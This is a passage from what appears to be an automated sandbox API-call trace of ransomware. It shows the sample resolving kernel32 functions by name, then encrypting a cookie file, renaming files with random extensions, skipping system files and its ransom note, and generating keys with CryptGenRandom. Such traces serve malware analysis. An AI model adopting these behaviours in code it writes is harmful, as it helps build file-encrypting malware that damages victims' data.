returned="CreateMailslotW" [0182.014] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0182.014] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0182.014] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0182.014] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0182.014] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0182.014] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0182.014] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0182.014] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0182.015] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0182.015] lstrlenA (lpString="CREATEPIPE") returned 10 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0182.015] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0182.015] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0182.015] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0182.015] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0182.015] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0182.015] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0182.015] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0182.015] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0182.015] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0182.015] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0182.015] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0182.015] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0182.015] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0182.015] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0182.015] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0182.015] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0182.015] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0182.015] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0182.016] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0182.016] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0182.016] lstrlenA (lpString="CREATETHREAD") returned 12 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0182.016] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0182.016] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0182.016] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0182.016] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0182.016] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0182.016] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0182.016] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0182.016] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0182.016] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0182.016] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0182.016] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0182.016] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0182.016] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0182.016] lstrlenA (lpString="CTRLROUTINE") returned 11 [0182.016] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0182.017] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0182.017] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0182.017] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0182.017] lstrlenA (lpString="DEBUGBREAK") returned 10 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0182.017] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0182.017] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0182.017] lstrlenA (lpString="DECODEPOINTER") returned 13 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0182.017] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0182.017] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0182.017] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0182.017] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0182.017] lstrlenA (lpString="DELETEATOM") returned 10 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0182.017] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0182.017] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0182.017] lstrlenA (lpString="DELETEFIBER") returned 11 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0182.017] lstrlenA (lpString="DELETEFILEA") returned 11 [0182.017] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0182.017] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0182.018] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0182.018] lstrlenA (lpString="DELETEFILEW") returned 11 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0182.018] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0182.018] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0182.018] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0182.018] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0182.018] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0182.018] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0182.018] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0182.018] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0182.018] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0182.018] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0182.018] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0182.018] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0182.018] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0182.018] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0182.018] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0182.018] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0182.019] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0182.019] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0182.019] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0182.019] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0182.019] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0182.019] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0182.019] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0182.019] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0182.019] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0182.019] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0182.019] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0182.019] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0182.019] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0182.019] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0182.019] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0182.019] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0182.019] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0182.019] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0182.019] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0182.020] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0182.020] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz") returned 121 [0182.020] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz.SuVrc") returned 127 [0182.020] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz.SuVrc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt.mqpz.suvrc"), dwFlags=0x0) returned 1 [0182.021] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.021] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.021] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.021] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x555a9a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x555a9a10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xabacf720, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv", cAlternateFileName="5P5NRG~1.OLP")) returned 1 [0182.021] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv", lpString2="DECRYPT-FILES.txt") returned -1 [0182.021] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv", lpString2="autorun.inf") returned -1 [0182.021] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv", lpString2="boot.ini") returned -1 [0182.021] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv", lpString2="desktop.ini") returned -1 [0182.021] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv", lpString2="ntuser.dat") returned -1 [0182.021] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv", lpString2="iconcache.db") returned -1 [0182.021] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv", lpString2="bootsect.bak") returned -1 [0182.022] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv", lpString2="ntuser.dat.log") returned -1 [0182.022] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv", lpString2="thumbs.db") returned -1 [0182.022] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv", lpString2="Bootfont.bin") returned -1 [0182.022] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv") returned 42 [0182.022] lstrcmpiW (lpString1="olpJv", lpString2="lnk") returned 1 [0182.022] lstrcmpiW (lpString1="olpJv", lpString2="exe") returned 1 [0182.022] lstrcmpiW (lpString1="olpJv", lpString2="sys") returned -1 [0182.022] lstrcmpiW (lpString1="olpJv", lpString2="dll") returned 1 [0182.022] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0182.022] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv") returned 42 [0182.022] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0182.022] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv" [0182.022] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpjv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.022] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=479) returned 1 [0182.022] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.022] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.023] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0182.023] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 